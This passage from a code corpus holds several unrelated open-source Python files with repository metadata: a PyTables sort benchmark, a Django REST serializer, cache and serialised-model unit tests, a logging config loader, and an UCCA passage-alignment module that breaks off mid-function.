## new_sheet.cell(row=cnt,column=12).value = sheet.cell(row=r,column=12).value
## new_sheet.cell(row=cnt,column=13).value = sheet.cell(row=r,column=13).value
## new_sheet.cell(row=cnt,column=14).value = sheet.cell(row=r,column=14).value
## new_sheet.cell(row=cnt,column=15).value = sheet.cell(row=r,column=15).value
## new_sheet.cell(row=cnt,column=16).value = sheet.cell(row=r,column=16).value
## new_sheet.cell(row=cnt,column=17).value = sheet.cell(row=r,column=17).value
## new_sheet.cell(row=cnt,column=18).value = sheet.cell(row=r,column=18).value
cnt+=1
cctv_new.save("trainreg.xlsx")
main()
| vimilimiv/weibo-popularity_judge-and-content_optimization | 数据处理/delete.py | Python | mit | 3,023 |
from time import perf_counter as clock
import numpy as np
import tables as tb
# Benchmark PyTables' in-place keysort against NumPy argsort + fancy indexing,
# across all supported key dtypes and both index dtypes.
N = 1000 * 1000
rnd = np.random.randint(N, size=N)
for dtype1 in ('S6', 'b1',
               'i1', 'i2', 'i4', 'i8',
               'u1', 'u2', 'u4', 'u8', 'f4', 'f8'):
    for dtype2 in ('u4', 'i8'):
        print("dtype array1, array2-->", dtype1, dtype2)
        a = np.array(rnd, dtype1)
        b = np.arange(N, dtype=dtype2)
        c = a.copy()
        # Reference: sort keys and permute the companion array via argsort.
        t1 = clock()
        d = c.argsort()
        e = c[d]
        f = b[d]
        tref = clock() - t1
        print("normal sort time-->", tref)
        # Candidate: keysort sorts `a` in place and permutes `b` alongside it.
        t1 = clock()
        tb.indexesextension.keysort(a, b)
        tks = clock() - t1
        print("keysort time-->", tks, " {:.2f}x".format(tref / tks))
        # np.alltrue was removed in NumPy 2.0; np.all is the supported API.
        assert np.all(a == e)
        assert np.all(f == d)
| avalentino/PyTables | bench/keysort.py | Python | bsd-3-clause | 886 |
from rest_framework import serializers
from simpleTODO.models import Tag, Todo
class AutoCreatedPrimaryKeyRelatedField(serializers.PrimaryKeyRelatedField):
    """PrimaryKeyRelatedField that creates the referenced object on demand.

    Unlike the stock field, an unknown primary key is not an error: the
    related object is created with that key via ``get_or_create``.
    """
    def to_internal_value(self, data):
        # Mirror the parent implementation, but substitute get_or_create for get.
        if self.pk_field is not None:
            data = self.pk_field.to_internal_value(data)
        try:
            # get_or_create returns a (object, created) tuple; keep the object.
            return self.get_queryset().get_or_create(pk=data)[0]
        except (TypeError, ValueError):
            # DRF's standard validation-error hook for a malformed pk value.
            self.fail('incorrect_type', data_type=type(data).__name__)
class TodoSerializer(serializers.ModelSerializer):
    """Serializer for Todo items; tags are auto-created from their primary keys."""
    tags = AutoCreatedPrimaryKeyRelatedField(queryset=Tag.objects, many=True)
    class Meta:
        model = Todo
        fields = ("id", "content", "deadline", "tags", "done")
    def create(self, validated_data):
        """Create a Todo owned by the requesting user and attach its tags."""
        tags = validated_data.pop("tags")
        todo = Todo(user=self.context["request"].user, **validated_data)
        todo.save()
        # A single add() call inserts all m2m rows in one bulk operation
        # instead of one query per tag.
        todo.tags.add(*tags)
        return todo
| BenjaminSchubert/HttpInfrastructure | dynamic-server/src/httpInfrastructure/simpleTODO/serializers.py | Python | mit | 965 |
import unittest
from simpledecorators.Cache import Cache, TimeCacheStorage
called = 0
class SafeTest(unittest.TestCase):
    """Tests for the @Cache decorator.

    A module-level ``called`` counter records how many times the wrapped
    function body actually runs, so the tests can prove cache hits.
    """
    def test_AddToCache(self):
        """Repeated calls with the same args run the body only once."""
        global called
        called = 0
        @Cache(cacheStorage=TimeCacheStorage(time_seconds=1, maxCount=1000))
        def func1(a,b,c):
            global called
            called += 1
            return a + b + c
        a = func1(1, 2, 3)
        b = func1(1, 2, 3)
        c = func1(1, 2, 3)
        d = func1(1, 2, 3)
        self.assertEqual(a, 1 + 2 + 3)
        self.assertEqual(a, b)
        self.assertEqual(b, c)
        self.assertEqual(c, d)
        # Only the first call executed the body; the rest were cache hits.
        self.assertEqual(called, 1)
    def test_ReturnsNone(self):
        """A cached None result is still treated as a hit, not a miss."""
        global called
        called = 0
        @Cache(cacheStorage=TimeCacheStorage(time_seconds=1, maxCount=1000))
        def func1(a, b, c):
            global called
            called += 1
            return None
        a = func1(1, 2, 3)
        b = func1(1, 2, 3)
        c = func1(1, 2, 3)
        d = func1(1, 2, 3)
        self.assertEqual(a, None)
        self.assertEqual(a, b)
        self.assertEqual(b, c)
        self.assertEqual(c, d)
        self.assertEqual(called, 1)
    def test_sameArguments(self):
        """Distinct functions do not share cache entries for equal arguments."""
        @Cache()
        def func1(a, b, c):
            return 1
        @Cache()
        def func2(a, b, c):
            return 2
        a = func1(1, 2, 3)
        b = func2(1, 2, 3)
        self.assertEqual(a, 1)
        self.assertEqual(b, 2)
# Allow running this test module directly with `python CacheTest.py`.
if __name__ == "__main__":
    unittest.main()
| shaddyx/simpleDecorators | tests/CacheTest.py | Python | mit | 1,515 |
__copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import logging.config
import yaml
import pkg_resources
from dotmap import DotMap
# Locate the packaged dev configuration file relative to this package.
config_path = pkg_resources.resource_filename(__name__, 'config/dev.yaml')
with open(config_path, 'r') as ymlfile:
    # DotMap allows attribute-style access (configuration.logging, ...).
    configuration = DotMap(yaml.full_load(ymlfile))
# Configure logging from the `logging` section of the YAML file.
logging.config.dictConfig(configuration.logging.toDict())
# NOTE(review): logger is keyed by __file__ rather than the usual __name__ —
# confirm this is intentional.
LOG = logging.getLogger(__file__)
LOG.info(f"Configuration loaded from {config_path}")
| gordon-elliott/glod | src/glod/configuration.py | Python | mit | 460 |
import sys
import pytest
from notifications_utils.serialised_model import (
SerialisedModel,
SerialisedModelCollection,
)
def test_cant_be_instatiated_with_abstract_properties():
    """Base classes and bare subclasses cannot be instantiated until the
    abstract members (ALLOWED_PROPERTIES / model) are defined."""
    class Custom(SerialisedModel):
        pass
    class CustomCollection(SerialisedModelCollection):
        pass
    with pytest.raises(TypeError) as e:
        SerialisedModel()
    # CPython 3.9 changed the wording from "methods" to "method" for a
    # single abstract member.
    if sys.version_info < (3, 9):
        assert str(e.value) == (
            "Can't instantiate abstract class SerialisedModel with abstract methods ALLOWED_PROPERTIES"
        )
    else:
        # Bug fix: this branch previously asserted a bare non-empty string,
        # which always passes; compare against the actual message like the
        # sibling branches do.
        assert str(e.value) == (
            "Can't instantiate abstract class SerialisedModel with abstract method ALLOWED_PROPERTIES"
        )
    with pytest.raises(TypeError) as e:
        Custom()
    if sys.version_info < (3, 9):
        assert str(e.value) == (
            "Can't instantiate abstract class Custom with abstract methods ALLOWED_PROPERTIES"
        )
    else:
        assert str(e.value) == (
            "Can't instantiate abstract class Custom with abstract method ALLOWED_PROPERTIES"
        )
    with pytest.raises(TypeError) as e:
        SerialisedModelCollection()
    if sys.version_info < (3, 9):
        assert str(e.value) == (
            "Can't instantiate abstract class SerialisedModelCollection with abstract methods model"
        )
    else:
        assert str(e.value) == (
            "Can't instantiate abstract class SerialisedModelCollection with abstract method model"
        )
    with pytest.raises(TypeError) as e:
        CustomCollection()
    if sys.version_info < (3, 9):
        assert str(e.value) == (
            "Can't instantiate abstract class CustomCollection with abstract methods model"
        )
    else:
        assert str(e.value) == (
            "Can't instantiate abstract class CustomCollection with abstract method model"
        )
def test_looks_up_from_dict():
    """Allowed properties are resolved from the serialised dict."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = {'foo'}
    assert Custom({'foo': 'bar'}).foo == 'bar'
def test_cant_override_custom_property_from_dict():
    """A real @property wins over the dict value and cannot be overwritten."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = {'foo'}
        @property
        def foo(self):
            return 'bar'
    with pytest.raises(AttributeError) as e:
        assert Custom({'foo': 'NOPE'}).foo == 'bar'
    # NOTE(review): CPython 3.11 reworded this to
    # "property 'foo' of 'Custom' object has no setter" — confirm the
    # interpreter versions this suite must support.
    assert str(e.value) == "can't set attribute"
@pytest.mark.parametrize('json_response', (
    {},
    {'foo': 'bar'},  # Should still raise an exception
))
def test_model_raises_for_unknown_attributes(json_response):
    """Attributes outside ALLOWED_PROPERTIES raise AttributeError even if
    the serialised dict contains them."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = set()
    model = Custom(json_response)
    assert model.ALLOWED_PROPERTIES == set()
    with pytest.raises(AttributeError) as e:
        model.foo
    assert str(e.value) == (
        "'Custom' object has no attribute 'foo'"
    )
def test_model_raises_keyerror_if_item_missing_from_dict():
    """An allowed property absent from the dict surfaces as a KeyError."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = {'foo'}
    with pytest.raises(KeyError) as e:
        Custom({}).foo
    assert str(e.value) == "'foo'"
@pytest.mark.parametrize('json_response', (
    {},
    {'foo': 'bar'},  # Should be ignored
))
def test_model_doesnt_swallow_attribute_errors(json_response):
    """An AttributeError raised inside a property must propagate unchanged,
    not be masked by the dynamic attribute lookup."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = set()
        @property
        def foo(self):
            raise AttributeError('Something has gone wrong')
    with pytest.raises(AttributeError) as e:
        Custom(json_response).foo
    assert str(e.value) == 'Something has gone wrong'
def test_dynamic_properties_are_introspectable():
    """dir() lists the dynamic properties (sorted, at the end)."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = {'foo', 'bar', 'baz'}
    instance = Custom({'foo': '', 'bar': '', 'baz': ''})
    assert dir(instance)[-3:] == ['bar', 'baz', 'foo']
def test_empty_serialised_model_collection():
    """An empty collection is falsy and has length 0."""
    class CustomCollection(SerialisedModelCollection):
        model = None
    instance = CustomCollection([])
    assert not instance
    assert len(instance) == 0
def test_serialised_model_collection_returns_models_from_list():
    """Indexing, iteration and concatenation yield model instances."""
    class Custom(SerialisedModel):
        ALLOWED_PROPERTIES = {'x'}
    class CustomCollection(SerialisedModelCollection):
        model = Custom
    instance = CustomCollection([
        {'x': 'foo'},
        {'x': 'bar'},
        {'x': 'baz'},
    ])
    assert instance
    assert len(instance) == 3
    assert instance[0].x == 'foo'
    assert instance[1].x == 'bar'
    assert instance[2].x == 'baz'
    assert [
        item.x for item in instance
    ] == [
        'foo',
        'bar',
        'baz',
    ]
    # Concatenating with a plain list keeps the models as models.
    assert [
        type(item) for item in instance + [1, 2, 3]
    ] == [
        Custom, Custom, Custom, int, int, int,
    ]
    instance_2 = CustomCollection([
        {'x': 'red'},
        {'x': 'green'},
        {'x': 'blue'},
    ])
    # Collection + collection preserves order, left operand first.
    assert [
        item.x for item in instance + instance_2
    ] == [
        'foo',
        'bar',
        'baz',
        'red',
        'green',
        'blue',
    ]
    assert [
        item.x for item in instance_2 + instance
    ] == [
        'red',
        'green',
        'blue',
        'foo',
        'bar',
        'baz',
    ]
| alphagov/notifications-utils | tests/test_serialised_model.py | Python | mit | 5,193 |
import inspect
import re
from collections import Counter
import distance
import numpy as np
import zss
from munkres import Munkres
from ucca.textutil import break2sentences, extract_terminals
from ucca import evaluation
from ucca import layer0, layer1
def compare(n1, n2):
    """Return True if the two nodes share at least one (equivalence-expanded) edge label."""
    return bool(labels(n1) & labels(n2))
def labels(n):
    """Return the set of incoming edge tags of ``n``, expanded with UCCA-equivalent tags."""
    return evaluation.expand_equivalents(set(e.tag for e in n.incoming))
def label(n):
    """Return the node's ftag (the tag of the edge from its foundational parent)."""
    return n.ftag
def is_terminal(n):
    """Return True if the node spans at most one terminal."""
    return len(n.get_terminals()) <= 1
def is_foundational(node):
    """Return True if the node is a foundational-layer (FN) node."""
    return node.tag == layer1.NodeTags.Foundational
def is_passage(n):
    """Return True if the node has no foundational parent, i.e. it is a passage root."""
    return not bool(n.fparent)
def is_comparable(n):
    """Return True for nodes worth aligning across passages: foundational,
    spanning more than one terminal, and not the passage root."""
    return is_foundational(n) and (not is_terminal(n)) and (not is_passage(n))
def top_from_passage(p):
    """Return the top-level elements (top scenes and top linkages) of a passage."""
    l = p.layer(layer1.LAYER_ID)
    return l.top_scenes + l.top_linkages
def preprocess_word(word):
    """Normalize a raw token for alignment: trim surrounding whitespace and lowercase it."""
    trimmed = word.strip()
    return trimmed.lower()
def align(sen1, sen2, string=True):
    """Find the best one-to-one mapping of words between two sentences.

    Words are compared by Levenshtein distance plus a small positional
    penalty, and the optimal assignment is solved with the Hungarian
    algorithm (Munkres). The shorter sentence is padded with "emptyWord"
    placeholders so the cost matrix is square.

    :param sen1: first sentence, as a string or a list of UCCA terminals
    :param sen2: second sentence, same form as sen1
    :param string: True if the sentences are strings, False for terminal lists
    :return: (word pairs, index pairs); indices are 0-based for strings and
             1-based for terminals, with unmatched words mapped to a
             negative placeholder index
    """
    if string:
        sen1 = list(map(preprocess_word, sen1.split()))
        sen2 = list(map(preprocess_word, sen2.split()))
    else:
        sen1 = [preprocess_word(terminal.text) for terminal in sen1]
        sen2 = [preprocess_word(terminal.text) for terminal in sen2]
    # find lengths
    length_dif = len(sen1) - len(sen2)
    if length_dif > 0:
        shorter = sen2
        longer = sen1
        switched = False
    else:
        shorter = sen1
        longer = sen2
        switched = True
    length_dif = abs(length_dif)
    shorter += ["emptyWord"] * length_dif
    # create matrix: edit distance plus a position-difference tie-breaker
    matrix = np.zeros((len(longer), len(longer)))
    for i in range(len(longer)):
        for j in range(len(longer) - length_dif):
            matrix[i, j] = distance.levenshtein(longer[i], shorter[j]) + float(abs(i - j)) / len(longer)
    # solve the assignment problem with munkres
    m = Munkres()
    indexes = m.compute(matrix)
    # remove indexing for emptywords and create string mapping
    refactored_indexes = []
    mapping = []
    start = 0 if string else 1
    for i, j in indexes:
        # j beyond the real words means "matched to padding" -> placeholder index
        if j >= len(longer) - length_dif:
            j = -1 - start
        if switched:
            refactored_indexes.append((j + start, i + start))
            mapping.append((shorter[j], longer[i]))
        else:
            refactored_indexes.append((i + start, j + start))
            mapping.append((longer[i], shorter[j]))
    return mapping, refactored_indexes
def regularize_word(word):
    """Canonicalize a word for comparison by removing every
    non-alphanumeric character (including underscores).

    The result may be empty (e.g. for pure punctuation tokens); callers
    such as _choose_ending_position rely on that to detect deleted tokens.
    """
    # Raw string avoids the invalid-escape-sequence warning that "[\W_]+"
    # produces as a plain literal; a single re.sub replaces compile + sub.
    return re.sub(r"[\W_]+", "", word)
def _to_text(passage, position):
    """Return the text of the terminal at the given position in the passage."""
    return passage.layer(layer0.LAYER_ID).by_position(position).text
def _choose_ending_position(passage, position):
    """Choose the correct sentence-ending position and its regularized text.

    position - an estimated sentence ending (e.g. by textutil.break2sentences).
    If regularization deletes the token at ``position`` (pure punctuation),
    step back one position. Returns (position, regularized text).
    """
    reg = regularize_word(_to_text(passage, position))
    # check current token is not deleted by regularization
    if not reg and position:
        position -= 1
        reg = regularize_word(_to_text(passage, position))
    return position, reg
def _count_mapping(positions1, positions2, word2word, from_key):
"""counts the number of satisfied mappings from positions[from_key] to the other positions"""
from_key -= 1
to_key = int(not from_key)
positions_list = [positions1, positions2]
terminal_positions1 = sorted(positions_list[from_key])
terminal_positions2 = sorted(positions_list[to_key])
sorted_word2word = sorted(word2word.copy(), key=lambda x: x[from_key])
# count in one pass in parallel, they are sorted
index = 0
count = 0
for mapping in sorted_word2word:
frm = mapping[from_key]
to = mapping[to_key]
if index == len(terminal_positions1):
break
if terminal_positions1[index] == frm:
index += 1
if to in terminal_positions2:
count += 1
return count
def two_sided_f(count1, count2, sum1, sum2):
    """Compute an F1-like score, with count2/sum2 as precision and
    count1/sum1 as recall.

    Returns 0 (after printing a diagnostic) on degenerate input: a zero
    denominator, a count exceeding its total, or zero precision + recall.
    """
    # check input
    if not (sum1 and sum2):
        print("got empty sums for F scores")
        return 0
    if sum1 < count1 or sum2 < count2:
        # Fixed copy-pasted message: this branch means a count exceeds its
        # total, not that a sum is empty.
        print("got counts larger than sums for F scores")
        return 0
    # calculate
    precision = count2 / sum2
    recall = count1 / sum1
    if precision + recall == 0:
        return 0
    return 2 * (precision * recall) / (precision + recall)
def node_word2word_similarity(node1, node2, word2word, graceful=True):
    """Compute an F-like score for two nodes based on the word2word mapping.

    The score is two_sided_f over how many of each node's terminal positions
    are mapped into the other node's terminals. ``graceful`` suppresses
    diagnostic prints; the return value is 0 on any invalid input.
    """
    if not (is_foundational(node1) and is_foundational(node2)):
        if not graceful:
            print("one of the requested nodes is not foundational")
        return 0
    terminal_positions1 = [term.para_pos for term in node1.get_terminals()]
    terminal_positions2 = [term.para_pos for term in node2.get_terminals()]
    # edge cases: a node with no terminals cannot be scored
    if not (len(terminal_positions1) and len(terminal_positions2)):
        if not graceful:
            print("error: no terminals in node")
            if not len(terminal_positions2):
                print(node2.ID)
            if not len(terminal_positions1):
                print(node1.ID)
        return 0
    # count satisfied mappings in both directions (recall / precision sides)
    count1 = _count_mapping(terminal_positions1, terminal_positions2, word2word, 1)
    count2 = _count_mapping(terminal_positions1, terminal_positions2, word2word, 2)
    return two_sided_f(count1, count2, len(terminal_positions1), len(terminal_positions2))
def get_lowest_fn(p):
    """Return the set of foundational nodes that directly dominate a terminal."""
    s = set()
    for term in extract_terminals(p):
        s.update([edge.parent for edge in term.incoming if is_foundational(edge.parent)])
    return s
def fully_align(p1, p2, word2word=None):
    """Align nodes of p1 to nodes of p2 by scoring all pairs of comparable nodes.

    word2word defaults to the terminal alignment produced by align_yields.
    """
    if not word2word:
        word2word = align_yields(p1, p2)
    nodes1 = set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))
    nodes2 = set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))
    return align_nodes(nodes1, nodes2, word2word)
def top_down_align(p1, p2, word2word=None):
    """Align nodes of p1 to nodes of p2 top-down.

    Starts from the passages' top elements, then repeatedly aligns the
    children of each already-matched pair.
    """
    if not word2word:
        word2word = align_yields(p1, p2)
    new = align_nodes(top_from_passage(p1), top_from_passage(p2), word2word)
    remaining = dict(new)
    mapping = dict(new)
    while remaining:
        n1, n2 = remaining.popitem()
        new = align_nodes(n1.children, n2.children, word2word)
        remaining.update(new)
        mapping.update(new)
    return mapping
# NOTE: the "buttom" misspelling is kept in the names for API compatibility.
def buttom_up_by_levels_align(p1, p2, word2word=None):
    """Align all nodes of two passages level by level, going up from the
    lowest foundational nodes towards the roots."""
    if not word2word:
        word2word = align_yields(p1, p2)
    mapping = {}
    nodes1 = set(get_lowest_fn(p1))
    nodes2 = set(get_lowest_fn(p2))
    while nodes1 and nodes2:
        mapping.update((align_nodes(nodes1, nodes2, word2word)))
        # move one level up on both sides
        nodes1 = set(node.fparent for node in nodes1 if node.fparent is not None)
        nodes2 = set(node.fparent for node in nodes2 if node.fparent is not None)
    return mapping
def buttom_up_paragraph_align(p1, p2, word2word=None):
    """Align nodes bottom-up, matching each candidate parent in p1 to the
    p2 node containing the most already-mapped children.

    Starts from the word2word terminal mapping; a node whose children are
    not all mapped yet is parked in ``waiting`` and retried on the next
    level. Ties are broken in favour of a shared edge label (compare).
    """
    if not word2word:
        word2word = align_yields(p1, p2)
    pairs1 = dict(p1.layer(layer0.LAYER_ID).pairs)
    pairs2 = dict(p2.layer(layer0.LAYER_ID).pairs)
    # seed the mapping with the aligned terminals (skip padding indices of -1)
    mapping = dict((pairs1[i], pairs2[j]) for i, j in word2word if i != -1 and j != -1)
    next_checking1 = next_checking2 = None
    checking1 = set(n for n in get_lowest_fn(p1) if is_comparable(n))
    checking2 = set(n for n in get_lowest_fn(p2) if is_comparable(n))
    save_next = True
    waiting = set()  # nodes that have unmapped children
    while checking1 and checking2:
        # save nodes from one level up for next look
        if save_next:
            next_checking1 = set(node.fparent for node in checking1 if node.fparent is not None)
            next_checking2 = set(node.fparent for node in checking2 if node.fparent is not None)
            save_next = False
        # look for best match for one of the checked node
        n1 = checking1.pop()
        best = 0
        is_waiting = False
        n2 = None
        for n in checking2:
            # score candidate n by how many of n1's children map into it
            current = 0
            for child in n1.children:
                if is_comparable(child) or child.tag == layer0.NodeTags.Word:
                    if child not in mapping:
                        # a child is still unmapped: retry n1 on a later pass
                        waiting.add(n1)
                        best = -1
                        is_waiting = True
                        break
                    if mapping[child] in n.children:
                        current += 1
            if is_waiting:
                break
            if current > best or (current == best and compare(n1, n)):
                n2 = n
                best = current
        if n2 and not is_waiting:
            mapping[n1] = n2
            checking2.remove(n2)  # can only map one node to each node in p2
        # if the queue is empty, fill it up if able
        if not checking1 or not checking2:
            checking1 |= next_checking1 | waiting
            checking2 |= next_checking2
            checking1 = checking1.difference(mapping.keys())
            save_next = True
    return mapping
def align_nodes(nodes1, nodes2, word2word):
    """finds best matching from the set of nodes nodes1 to the set nodes2
    Note: this function is not symmetrical

    word2word -- terminal alignment used to score candidate pairs.
    Returns a dict mapping foundational nodes of nodes1 to their best-scoring
    foundational node in nodes2 (several keys may share the same value).
    """
    best = {}     # node1 -> best similarity seen so far
    mapping = {}  # node1 -> currently best-scoring node2
    gen1 = (node for node in nodes1 if is_foundational(node))
    gen2 = [node for node in nodes2 if is_foundational(node)]
    for node1 in gen1:
        for node2 in gen2:
            sim = node_word2word_similarity(node1, node2, word2word)
            # keep node2 when strictly better, or equal-but-preferred by compare()
            if sim and (node1 not in best or sim > best[node1] or (sim == best[node1] and compare(node1, node2))):
                best[node1] = sim
                mapping[node1] = node2
            # if best match got, stop looking for it
            # NOTE(review): best[node1] raises KeyError if every candidate so far
            # scored falsy -- presumably similarity is truthy for some early
            # candidate; confirm against node_word2word_similarity.
            if best[node1] == 1 and compare(node1, node2):
                break
    return mapping
def break2common_sentences(p1, p2):
    """finds the positions of the common sentence endings.

    Breaking is done according to the text and to the ucca annotation of both
    passages.
    Returns two lists, each containing positions of sentence endings.
    Guarantees the same number of positions is acquired and the last position
    is the passage end.
    """
    # break to sentences
    broken1 = break2sentences(p1)
    broken2 = break2sentences(p2)
    # find common endings
    positions1 = []
    positions2 = []
    i = 0
    j = 0
    # walk both boundary lists in lockstep, resynchronizing when one passage
    # has an extra/missing sentence ending
    while j < len(broken2) and i < len(broken1):
        position1, reg1 = _choose_ending_position(p1, broken1[i])
        position2, reg2 = _choose_ending_position(p2, broken2[j])
        # peek one boundary ahead on each side (clamped at the last one)
        if i + 1 < len(broken1):
            pos_after1, one_after1 = _choose_ending_position(p1, broken1[i + 1])
        else:
            pos_after1, one_after1 = position1, reg1
        if j + 1 < len(broken2):
            pos_after2, one_after2 = _choose_ending_position(p2, broken2[j + 1])
        else:
            pos_after2, one_after2 = position2, reg2
        if reg1 == reg2:
            positions1.append(position1)
            positions2.append(position2)
        # deal with addition or subtraction of a sentence ending
        elif one_after1 == reg2:
            i += 1
            positions1.append(pos_after1)
            positions2.append(position2)
        elif reg1 == one_after2:
            j += 1
            positions1.append(position1)
            positions2.append(pos_after2)
        i += 1
        j += 1
    # add last sentence in case skipped
    position1, reg1 = _choose_ending_position(p1, broken1[-1])
    position2, reg2 = _choose_ending_position(p2, broken2[-1])
    if (not positions1) or (not positions2) or (
            positions1[-1] != position1 and positions2[-1] != position2):
        positions1.append(broken1[-1])
        positions2.append(broken2[-1])
    elif positions1[-1] != position1 and positions2[-1] == position2:
        positions1[-1] = position1
    elif positions1[-1] == position1 and positions2[-1] != position2:
        positions2[-1] = broken2[-1]
    return positions1, positions2
def reverse_mapping(word2word):
    """Invert an alignment: each (i, j) pair becomes (j, i), returned as a set."""
    return {(right, left) for left, right in word2word}
def align_yields(p1, p2):
    """Find the best word-to-word alignment between two passages.

    The passages are split at their common sentence boundaries and the words
    of each sentence pair are then aligned with `align`.

    Note: this function is symmetrical up to tuple order;
    consider using reverse_mapping instead of calling it twice.

    Returns a set of tuples (i, j) mapping terminal positions in p1 (i)
    to aligned terminal positions in p2 (j); -1 marks an unaligned side.

    Raises:
        ValueError: if break2common_sentences yields a different number of
            sentence boundaries for the two passages.
    """
    positions1, positions2 = break2common_sentences(p1, p2)
    if len(positions1) != len(positions2):
        # Previously this case was only printed and the function silently
        # returned None, crashing callers later with a confusing error.
        raise ValueError(
            "number of sentences acquired from break2common_sentences does not match")
    terminals1 = extract_terminals(p1)
    terminals2 = extract_terminals(p2)
    # map the words in each sentence pair to each other
    mapping = set()
    sentence_start1 = 0
    sentence_start2 = 0
    for i in range(len(positions1)):
        sentence1 = terminals1[sentence_start1:positions1[i]]
        sentence2 = terminals2[sentence_start2:positions2[i]]
        for (j, k) in align(sentence1, sentence2, False)[1]:
            # -1 marks a word with no counterpart; keep it unshifted
            if j != -1:
                j += sentence_start1
            if k != -1:
                k += sentence_start2
            mapping.add((j, k))
        sentence_start1 = positions1[i]
        sentence_start2 = positions2[i]
    return mapping
def fully_aligned_distance(p1, p2):
    """Two-sided F-score of label-matching nodes under the best node alignment
    in each direction (p1->p2 and p2->p1)."""
    word2word = align_yields(p1, p2)
    comparable1 = {n for n in p1.layer(layer1.LAYER_ID).all if is_comparable(n)}
    comparable2 = {n for n in p2.layer(layer1.LAYER_ID).all if is_comparable(n)}
    # best mapping in each direction (align_nodes is not symmetrical)
    forward = align_nodes(comparable1, comparable2, word2word)
    backward = align_nodes(comparable2, comparable1, reverse_mapping(word2word))
    matches1 = sum(1 for a, b in forward.items() if compare(a, b))
    matches2 = sum(1 for a, b in backward.items() if compare(a, b))
    score = two_sided_f(matches1, matches2, len(comparable1), len(comparable2))
    print(inspect.currentframe().f_code.co_name, " returns ", score)
    return score
# Edge tags regarded as a node's "main relation" when counting token-level
# matches: parallel scenes, participants and adverbials.
MAIN_RELATIONS = [layer1.EdgeTags.ParallelScene,
                  layer1.EdgeTags.Participant,
                  layer1.EdgeTags.Adverbial
                  ]
def token_matches(p1, p2, map_by):
    """returns the number of matched nodes from p1 whose tag is in MAIN_RELATIONS.

    p1, p2 -- passages
    map_by -- a function that maps all nodes from p1 to p2 nodes
    Note: this function is not symmetrical
    """
    count = 0
    mapping = map_by(p1, p2)
    print("mapping length", len(mapping))
    # count mapped pairs that are both comparable, carry a main relation, and match
    for node1, node2 in mapping.items():
        if is_comparable(node1) and is_comparable(node2) and label(node1) in MAIN_RELATIONS and compare(node1, node2):
            count += 1
    return count
def token_distance(p1, p2, map_by=buttom_up_by_levels_align):
    """Two-sided F-score over nodes carrying a main relation, comparing only
    the main relation of each aligned node pair."""
    matched1 = token_matches(p1, p2, map_by)
    matched2 = token_matches(p2, p1, map_by)
    main1 = {n for n in p1.layer(layer1.LAYER_ID).all
             if is_comparable(n) and label(n) in MAIN_RELATIONS}
    main2 = {n for n in p2.layer(layer1.LAYER_ID).all
             if is_comparable(n) and label(n) in MAIN_RELATIONS}
    score = two_sided_f(matched1, matched2, len(main1), len(main2))
    print(inspect.currentframe().f_code.co_name)
    print("counts", matched1, matched2)
    print("lens", len(main1), len(main2))
    print(score)
    return score
def tree_structure(node):
    """Recursively wrap *node* and its descendants as (node, [subtrees]) pairs."""
    subtrees = [sub for sub in map(tree_structure, node.children) if sub]
    return node, subtrees
def tree_structure_aligned(n1, n2, word2word):
    """ gets two nodes and returns a tree structure from each with the proper mapping

    Returns two (node, [subtrees]) pairs whose children lists are ordered so
    that matched children occupy the same index on both sides.
    """
    tree1 = []
    tree2 = []
    # best matching between the two children lists
    mapping = align_nodes(n1.children, n2.children, word2word)
    # add matching (appended in lockstep so tree1[i] aligns with tree2[i])
    for s in mapping:
        if s in mapping and mapping[s] not in tree2:
            tree1.append(s)
            tree2.append(mapping[s])
    # add not matching
    # NOTE(review): unmatched children are appended in arbitrary relative
    # order, so indices past the matched prefix may pair unrelated nodes in
    # the recursion below -- confirm intended.
    for s in n1.children:
        if s not in tree1:
            tree1.append(s)
    for s in n2.children:
        if s not in tree2:
            tree2.append(s)
    # convert recursivly
    longer = max(len(n1.children), len(n2.children))
    shorter = min(len(n1.children), len(n2.children))
    res1 = []
    res2 = []
    for i in range(shorter):
        t1, t2 = tree_structure_aligned(tree1[i], tree2[i], word2word)
        res1.append(t1)
        res2.append(t2)
    # the longer side keeps its surplus children as plain (unaligned) subtrees
    if len(n1.children) == longer:
        res1 += [tree_structure(n) for n in n1.children[shorter:]]
    if len(n2.children) == longer:
        res2 += [tree_structure(n) for n in n2.children[shorter:]]
    return (n1, res1), (n2, res2)
def convert_structure_to_zss(tree):
    """Convert a (node, [subtrees]) tree structure into an equivalent zss.Node tree."""
    root, children = tree
    name = label(root) if hasattr(root, "ftag") else str(type(root))
    return zss.Node(name, [convert_structure_to_zss(child) for child in children])
def prune_leaves(tree, flter=lambda x: True):
    """Take a (node, children) tree structure and prune its leaves.

    tree -- a (node, [subtrees]) pair as built by tree_structure
    flter -- boolean function on a node; True allows that node's childless
        subtrees to be dropped
    Returns the pruned (node, [subtrees]) pair, or None for a leaf tree.

    NOTE(review): the recursive call does not pass `flter` down, so a custom
    filter only takes effect at the root level -- confirm this is intended.
    """
    if tree[1]:
        res = []
        for t in tree[1]:
            if t[1]:
                pruned = prune_leaves(t)
                # NOTE(review): when flter(tree[0]) is False a None `pruned` is
                # appended here but filtered out again below -- branch looks inert.
                if pruned or not flter(tree[0]):
                    res.append(pruned)
        return tree[0], [n for n in res if n is not None]
    return
def create_ordered_trees(p1, p2, word2word=None):
    """ creates two trees from two passages

    The two returned (node, [subtrees]) structures are ordered so aligned
    top-level nodes occupy the same index; leaves and non-comparable subtrees
    are pruned at the end.
    word2word -- optional precomputed terminal alignment; computed if omitted.
    """
    if not word2word:
        word2word = align_yields(p1, p2)
    top1 = top_from_passage(p1)
    top2 = top_from_passage(p2)
    # best matching between the top-level nodes of both passages
    mapping = align_nodes(top1, top2, word2word)
    tree1 = []
    tree2 = []
    # matched tops first, in lockstep so tree1[i] aligns with tree2[i]
    for s in top_from_passage(p1):
        if s in mapping and mapping[s] not in tree2:
            tree1.append(s)
            tree2.append(mapping[s])
    # then the unmatched tops of each side
    for s in top_from_passage(p1):
        if s not in tree1:
            tree1.append(s)
    for s in top_from_passage(p2):
        if s not in tree2:
            tree2.append(s)
    # convert recursivly
